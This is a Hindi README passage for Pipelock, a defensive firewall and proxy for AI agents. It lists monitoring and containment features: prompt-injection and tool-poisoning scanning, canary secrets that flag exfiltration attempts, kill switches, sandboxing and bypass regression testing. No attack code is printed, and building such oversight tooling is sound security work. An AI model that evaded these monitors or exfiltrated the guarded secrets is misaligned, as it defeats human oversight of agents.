| पुनरुत्पादनीय बिल्ड | बाइट-दर-बाइट OSS बाइनरी जाँच, स्थिर इनपुट, रिलीज़ एकीकरण, और दायरा |
| निष्कर्ष दमन | नियम नाम, पथ मिलान, इनलाइन टिप्पणियाँ |
| ट्रांसपोर्ट मोड | सभी प्रॉक्सी मोड और उनकी स्कैनिंग क्षमताएँ |
| OWASP MCP शीर्ष 10 | OWASP MCP शीर्ष 10 कवरेज |
| OWASP एजेंटिक शीर्ष 15 | OWASP एजेंटिक AI शीर्ष 15 कवरेज |
| OWASP LLM शीर्ष 10 | LLM अनुप्रयोगों के लिए OWASP शीर्ष 10 (2025) कवरेज |
| EU AI अधिनियम | EU AI अधिनियम अनुपालन मैपिंग |
| NIST 800-53 | NIST SP 800-53 Rev. 5 नियंत्रण मैपिंग |
| आकलन मैपिंग | रनटाइम नियंत्रणों को उन फ्रेमवर्क से मैप करता है जिनके खिलाफ pipelock assess क्रय और ऑडिट समीक्षा के लिए साक्ष्य उत्पन्न करता है |
| नीति विनिर्देश v0.1 | पोर्टेबल एजेंट फ़ायरवॉल नीति प्रारूप |
| मध्यस्थता लिफाफा | साइडबैंड मेटाडेटा हेडर, कॉन्फ़िगरेशन, रसीदों के साथ अंतःक्रिया |
| मीडिया नीति | स्टेगो स्ट्रिपिंग, SVG हार्डनिंग, अनुमत प्रकार, आकार सीमाएँ |
| साक्ष्य शब्दावली | ActionReceipt, EvidenceReceipt, फ़्लाइट रिकॉर्डर, चेकपॉइंट, एंकर, कवरेज प्रमाणपत्र और ऑडिट पैकेट के लिए त्वरित संदर्भ, अखंडता-बनाम-पूर्णता और पिन्ड-बनाम-अनपिन्ड भेद के साथ |
| रसीद सत्यापन | pipelock verify-receipt, फ्लीट रसीद रिपोर्ट सत्यापन, स्टैंडअलोन pipelock-verifier, अनुरूपता सूट, श्रृंखला अखंडता |
| रसीद विनिर्देश प्रोफ़ाइल | कार्य रसीदों के लिए in-toto अटेस्टेशन प्रेडिकेट, सहवर्ती SCITT और AARP प्रोफ़ाइल और पूर्व-कला मैपिंग के साथ |
| ऑडिट पैकेट खतरा मॉडल | सत्यापित ऑडिट पैकेट क्या साबित करते हैं, क्या नहीं साबित करते, और भरोसे की धारणाएँ जिन्हें आश्रित पक्षों को पिन करना चाहिए |
| रसीद ट्रांसपोर्ट कवरेज | fetch, forward, CONNECT/TLS, WebSocket, MCP, और A2A पथों पर रसीद उत्सर्जन मैट्रिक्स |
| सीखें और लॉक करें | प्रति-एजेंट व्यवहारिक अनुबंध: निरीक्षण, संकलन, छाया, अनुसमर्थन, प्रचार (v2.4) |
| संघ | इनबाउंड मध्यस्थता लिफाफा सत्यापन, SPIFFE अभिनेता प्रारूप, RFC 9421 प्रसिद्ध निर्देशिका (v2.4) |
| ब्लॉक-कारण हेडर | X-Pipelock-Block-Reason स्कीमा, कारण शब्दावली, पुनर्प्रयास संकेत (v2.4) |
| स्वास्थ्य एंडपॉइंट | /health 503 वेज पहचान, उपतंत्र हार्टबीट, ऑपरेटर डैशबोर्ड कॉन्फ़िग (v2.4) |
| होस्ट कंटेनमेंट | 3-UID nftables owner-match कंटेनमेंट के लिए pipelock contain install / run / verify / rollback / add-tool / grant-workspace / revoke-workspace / ca-refresh कर्नेल-अवलोकित मुद्रा प्रमाणीकरण के साथ (v2.5) |
| MCP अखंडता मेनिफेस्ट | विश्वसनीय MCP बाइनरी-अखंडता मेनिफेस्ट उत्पन्न करें, सत्यापित करें, हस्ताक्षर करें और आवश्यक बनाएं (v2.5) |
| अनुकूली CLI | अनुकूली-प्रवर्तन रनटाइम स्थिति का प्रशासन API के माध्यम से निरीक्षण और फ्लश करें (v2.5) |
| कंडक्टर | एंटरप्राइज़ फ्लीट नियंत्रण विमान: नीति वितरण, ऑडिट सिंक, रिमोट किल, रोलबैक, mTLS/SPIFFE ट्रस्ट, लाइसेंसिंग (v2.7, एंटरप्राइज़) |
| कंडक्टर ऑपरेटर रनबुक | हाथों-हाथ स्थानीय फ्लीट वॉकथ्रू: बूटस्ट्रैप, सर्व करें, बैच पर हस्ताक्षर करें, ऑफ़लाइन सत्यापित करें |
| कंडक्टर ऑपरेटर क्विकस्टार्ट | शून्य से केवल-पढ़ने के लिए फ्लीट ऑडिट: लाइसेंस, ऑपरेटर mTLS प्रमाणपत्र, ऑडिटर टोकन, केवल-पढ़ने के आदेश |
| Kubernetes एंटरप्राइज़ तैनाती | Helm-आधारित कंडक्टर फ्लीट: नियंत्रण विमान, अनुयायी, फ्लीट-सिंक, PKI गुप्त, NetworkPolicy |
pipelock license | भुगतान सुविधाओं को अनलॉक करने वाला लाइसेंस स्थापित करें, निरीक्षण करें और जाँचें (Pro agents, एंटरप्राइज़ fleet) |
pipelock baseline | प्रमाणित प्रशासन API के माध्यम से व्यवहारिक-बेसलाइन प्रोफ़ाइल का निरीक्षण, अनुसमर्थन और पुनः सीखें |
| मुद्रा कैप्सूल | हस्ताक्षरित मुद्रा स्नैपशॉट, posture verify CLI, CI गेट, स्कोरिंग मॉडल |
pipelock init sidecar | प्रवर्तित Kubernetes सहयोगी-प्रॉक्सी मेनिफेस्ट और MCP लॉन्चर अनुबंध उत्पन्न करें (सामरिक-मर्ज, Kustomize, Helm मान) |
pipelock session | एयरलॉक निरीक्षण और पुनर्प्राप्ति के लिए ऑपरेटर CLI (सूची, निरीक्षण, व्याख्या, जारी, समाप्त, पुनर्प्राप्त) |
pipelock keys status | एकीकृत हस्ताक्षर-कुंजी सूची: प्रति-उद्देश्य स्रोत, उपस्थिति, पठनीयता, वैधता और सार्वजनिक-कुंजी फिंगरप्रिंट |
| फ़्लाइट रिकॉर्डर | हैश-चेन्ड हस्ताक्षरित साक्ष्य लॉग: डिफ़ॉल्ट-ऑन व्यवहार, ट्रांसक्रिप्ट-रूट सील, रिडक्शन, एस्क्रो, कुंजी रोटेशन |
| TLS इंटरसेप्शन | CONNECT-टनल MITM: CA सेटअप, बॉडी/हेडर/प्रतिक्रिया स्कैनिंग, पासथ्रू डोमेन |
| कैनरी टोकन | सिंथेटिक रहस्य जो उस समय अलर्ट ट्रिगर करते हैं जब कोई एजेंट उन्हें निकालने का प्रयास करता है |
| डिटेक्शन एकीकरण | Pipelock निर्णयों और साक्ष्य को बाहरी डिटेक्शन / SIEM पाइपलाइनों में फ़ीड करें |
| PR समीक्षा | पुल अनुरोधों के लिए मैनुअल-ट्रिगर AI सुरक्षा समीक्षा (/review टिप्पणी) |
| MCP इंस्पेक्टर फ्रंट | Pipelock स्कैनिंग के माध्यम से फ्रंट MCP डेव टूल्स (इंस्पेक्टर, परीक्षण सर्वर) चलाएं |
pipelock demo | स्व-निहित हमले के परिदृश्य हस्ताक्षरित, ऑफ़लाइन-सत्यापने योग्य रसीदों के साथ, बिना कॉन्फ़िग या नेटवर्क की आवश्यकता |
| बैज | डाउनस्ट्रीम परियोजनाओं पर scanned by pipelock बैज के लिए ड्रॉप-इन Markdown |
परियोजना संरचना```text
cmd/pipelock/ CLI entry point
internal/
cli/ 60+ Cobra commands (run, check, init, generate, mcp, session, posture, rules, ...)
diag/ pipelock doctor and install-verification diagnostics
session/ pipelock session, pipelock adaptive, and pipelock baseline operator CLIs
setup/ pipelock init sidecar: companion-proxy manifest generation (K8s)
config/ YAML config, validation, defaults, hot-reload (fsnotify)
scanner/ Ordered URL scanning pipeline + response injection detection
audit/ Structured JSON logging (zerolog) + event emission dispatch
proxy/ HTTP proxy: fetch, forward (CONNECT), WebSocket, DNS pinning, TLS
mcp/ MCP proxy + bidirectional scanning + tool poisoning + chains
integrity/ MCP binary/script integrity manifests and trust workflow
discover/ IDE/agent config discovery (Claude Code, Cursor, VS Code, JetBrains)
killswitch/ Emergency deny-all (6 sources) + port-isolated API
envelope/ Mediation envelope (RFC 8941) for sideband metadata
media/ Image metadata stripping (JPEG/PNG byte-level surgery)
normalize/ Text-normalization transforms (NFKC, invisible chars, leetspeak, whitespace, vowel-fold) for the scanner cascade
receipt/ Action receipt signing + hash-chained evidence
posture/ Posture capsule schema, signing, scoring, verify policy
session/ Session state, taint classification, task boundaries, trust overrides
rules/ Bundle loader, tier taxonomy, RequiredFeatures enforcement
sandbox/ Landlock, seccomp, netns, macOS sandbox-exec
shield/ Airlock, browser shield, SVG hardening
signing/ Ed25519 key management
integrity/ SHA256 file integrity monitoring
report/ HTML/JSON audit report generation
enterprise/ Multi-agent features (ELv2)
sdk/conformance/ Cross-implementation receipt verification test vectors
charts/ Helm chart for Kubernetes deployment
configs/ 7 built-in preset config files
docs/ Guides, references, compliance mappings
---
## परीक्षण
Pipelock को एक सुरक्षा उत्पाद की तरह परीक्षण किया जाता है। ओपन-सोर्स कोर में यूनिट, इंटीग्रेशन और एंड-टू-एंड परीक्षण हैं। एक अलग निजी प्रतिकूल सूट उत्पादन बाइनरी के विरुद्ध हमले वर्गों का अभ्यास करता है। प्रत्येक बायपास रिलीज़ से पहले एक रिग्रेशन परीक्षण में परिवर्तित हो जाता है।
| मीट्रिक | मान |
|--------|-------|
| Go परीक्षण (`-race` के साथ) | यूनिट, इंटीग्रेशन और एंड-टू-एंड पथ |
| कवरेज गेट (codecov) | 91% Apache-2.0 कोर प्रोजेक्ट, 95% नए कोड पर पैच |
| एवेज़न कवरेज | सार्वजनिक बायपास-प्रतिरोध मैट्रिक्स + निजी प्रतिकूल कॉर्पस |
| स्कैनर हॉट-पथ ओवरहेड | ~40us प्रति URL स्कैन (हॉट-पथ बेंचमार्क; [docs/performance.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/performance.md) देखें) |
| CI मैट्रिक्स | Go 1.25 + 1.26, CodeQL, golangci-lint |
| आपूर्ति श्रृंखला | SLSA प्रोवेनेंस, CycloneDX SBOM, cosign हस्ताक्षर |
स्थानीय रूप से सत्यापित करने के लिए `make test` चलाएं। स्वतंत्र बेंचमार्क: सार्वजनिक [agent-egress-bench](https://github.com/luckyPipewrench/agent-egress-bench) कॉर्पस। [लाइव परिणाम](https://pipelab.org/gauntlet/) देखें।
---
## श्रेय
- वास्तुकला [Anthropic के Claude Code सैंडबॉक्सिंग](https://www.anthropic.com/engineering/claude-code-sandboxing) और [sandbox-runtime](https://github.com/anthropic-experimental/sandbox-runtime) से प्रभावित है
- खतरा मॉडल [OWASP Agentic AI Top 10](https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/) से सूचित है
- देखें कि कैसे Pipelock इस स्थान में अन्य उपकरणों से संबंधित है: [docs/comparison.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/comparison.md)
- डायलन कोरालेस से सुरक्षा समीक्षा योगदान
योगदान का स्वागत है। दिशानिर्देशों के लिए [CONTRIBUTING.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/CONTRIBUTING.md) देखें।
यदि Pipelock उपयोगी है, तो कृपया [इस रिपॉजिटरी को स्टार करें](https://github.com/luckyPipewrench/pipelock)। इससे दूसरों को प्रोजेक्ट ढूंढने में मदद मिलती है।
---
## लाइसेंस
Pipelock कोर **Apache License 2.0** के तहत लाइसेंस प्राप्त है। कॉपीराइट 2026 Joshua Waldrep।
मल्टी-एजेंट सुविधाएँ (प्रति-एजेंट पहचान, बजट और कॉन्फ़िगरेशन अलगाव) `enterprise/` निर्देशिका में हैं, जो `enterprise` बिल्ड टैग द्वारा नियंत्रित हैं और **Elastic License 2.0 (ELv2)** के तहत लाइसेंस प्राप्त हैं। ये सुविधाएँ एक मान्य लाइसेंस कुंजी के साथ सक्रिय होती हैं।
ओपन-सोर्स कोर भुगतान सुविधाओं के बिना स्वतंत्र रूप से काम करता है। सभी स्कैनिंग, डिटेक्शन और सिंगल-एजेंट सुरक्षा मुफ्त है।
पूर्व-निर्मित रिलीज़ आर्टिफैक्ट्स (Homebrew, GitHub रिलीज़, Docker इमेज) में भुगतान-स्तरीय कोड शामिल है जो एक मान्य लाइसेंस कुंजी के साथ सक्रिय होता है। `go install` या रिपॉजिटरी `Dockerfile` के साथ स्रोत से निर्माण करने पर केवल-समुदाय बाइनरी उत्पन्न होती है।
Apache 2.0 पाठ के लिए [LICENSE](https://github.com/luckypipewrench/pipelock/blob/HEAD/LICENSE) और ELv2 पाठ के लिए [enterprise/LICENSE](https://github.com/luckypipewrench/pipelock/blob/HEAD/enterprise/LICENSE) देखें।